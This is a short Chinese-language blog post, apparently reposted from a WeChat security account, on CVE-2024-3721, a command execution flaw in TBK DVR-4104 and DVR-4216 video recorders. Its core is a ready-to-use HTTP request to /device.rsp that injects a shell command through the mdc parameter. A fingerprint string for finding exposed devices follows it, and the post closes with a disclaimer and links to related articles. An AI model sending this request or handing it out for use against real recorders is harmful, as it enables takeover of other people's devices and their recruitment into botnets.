TBK DVR硬盘录像机任意命令执行漏洞 CVE-2024-3721

渗透技巧 6个月前 admin

190 0 0

漏洞名称

TBK DVR硬盘录像机任意命令执行漏洞 CVE-2024-3721

漏洞复现

1、替换需要执行的命令，发送请求

GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=ls HTTP/1.1Cookie: uid=xxxHost: 1.1.1.1

搜索指纹

“Location: /login.rsp”

利用条件

TBK DVR-4104

TBK DVR-4216

TBK DVR硬盘录像机任意命令执行漏洞 CVE-2024-3721

免责声明

本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者及本公众号不为此承担任何责任。

长按下方二维码，关注巨黑科，学习漏洞信息！

原文始发于微信公众号（巨黑科）：TBK DVR硬盘录像机任意命令执行漏洞 CVE-2024-3721

版权声明：admin 发表于 2024年5月11日上午8:01。
转载请注明：TBK DVR硬盘录像机任意命令执行漏洞 CVE-2024-3721 | CTF导航

相关文章

滥用隐藏属性来攻击 Node.js 生态系统

admin

561

BugBounty自动化dom xss 赏金30000$分享

admin

568

代码审计公开课|yapi代码审计到rce(下)

admin

423

Abusing AD CS Certificate Template – ESC1, ESC2, ESC3

admin

62

小程序session_key泄露漏洞

admin

942

Tapestry4 RCE分析

admin

841